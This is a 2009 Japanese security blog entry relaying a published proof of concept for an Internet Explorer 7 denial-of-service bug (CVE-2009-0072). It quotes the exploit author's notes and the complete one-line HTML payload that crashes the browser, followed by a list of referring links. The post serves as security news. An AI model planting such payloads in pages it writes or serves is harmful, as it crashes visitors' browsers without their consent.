2009年01月13日(火曜日) ピース記念日
■[IT][セキュリティ]MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit(情報元のブックマーク数
)
IE7で悪意のあるページを開くと、svchost.exeにCPUが100%になる問題のPoCが出ています。
########################################################################################
#svchost.exe CPU usage boils up to almost 100 percent when we open the malicious
#webpage and IE7 (Version 7.0.5730.13) closes with all tabs.
#
#Tested On:
# Microsoft(R) Windows(R) Server 2003, Standard Edition with Service Pack 2
#
#With:
# IE Version 7.0.5730.13
#
# I didn't use Javascript anywhere in the HTML below. It might be the background
# processing of "onload" NULL pointer by IE which leads to the cra$$$hhhhh!!!
#
#Reference:
# http://xforce.iss.net/xforce/xfdb/47788
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0072
#
#########################################################################################
#########Thanx 2 str0ke, milw0rm, SkyLined and all Security folks !!!####################
#########################################################################################
no title
たったこれだけ?!
<html> <title>MS IE 'screen[""]' Remote Denial of Service Vulnerability</title> <body onload=screen[""]> </html>
Permalink | コメント(0) | トラックバック(0) | 05:06 ![MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit(情報元のブックマーク数[http://www.milw0rm.com/exploits/7710:bookmark]) - まっちゃだいふくの日記★とれんどふりーく★ を含むブックマーク](http://d.hatena.ne.jp/images/b_entry_te.gif "MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit(情報元のブックマーク数[http://www.milw0rm.com/exploits/7710:bookmark]) - まっちゃだいふくの日記★とれんどふりーく★ を含むブックマーク"){kind=small}
![はてなブックマーク - MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit(情報元のブックマーク数[http://www.milw0rm.com/exploits/7710:bookmark]) - まっちゃだいふくの日記★とれんどふりーく★](http://b.hatena.ne.jp/entry/image/http://d.hatena.ne.jp/ripjyr/20090113/1231790810 "はてなブックマーク - MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit(情報元のブックマーク数[http://www.milw0rm.com/exploits/7710:bookmark]) - まっちゃだいふくの日記★とれんどふりーく★")
![MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit(情報元のブックマーク数[http://www.milw0rm.com/exploits/7710:bookmark]) - まっちゃだいふくの日記★とれんどふりーく★ のブックマークコメント](http://r.hatena.ne.jp/images/popup.gif "MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit(情報元のブックマーク数[http://www.milw0rm.com/exploits/7710:bookmark]) - まっちゃだいふくの日記★とれんどふりーく★ のブックマークコメント"){kind=small}
- 72 http://www.google.co.jp/search?sourceid=navclient&hl=ja&ie=UTF-8&rlz=1T4ADBF_jaJP246JP246&q=テレ朝が自作自演
- 34 http://reader.livedoor.com/reader/
- 26 http://www.google.co.jp/search?hl=ja&client=firefox-a&rls=org.mozilla:ja:official&hs=Oo5&q=セキュリティ 勉強会 京都&btnG=検索&lr=lang_ja
- 17 http://stressfulangel.cocolog-nifty.com/stressful_angel/
- 15 http://d.hatena.ne.jp/monyakata/20090113/1231826801
- 13 http://www.google.co.jp/search?hl=ja&lr=lang_ja&client=firefox-a&rls=org.mozilla:ja:official&hs=r0k&q=flash+player++インタネット通信&start=10&sa=N
- 13 http://www.google.co.jp/search?hl=ja&q=trendプロテクト+遅い&btnG=検索&lr=
- 13 http://www.google.co.jp/search?hl=ja&q=trend+プロテクト+遅い&lr=&aq=2&oq=trend+プロテクト
- 13 http://www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=Java+OCTED&num=50
- 12 http://d.hatena.ne.jp/rurar/20090113/1231852210
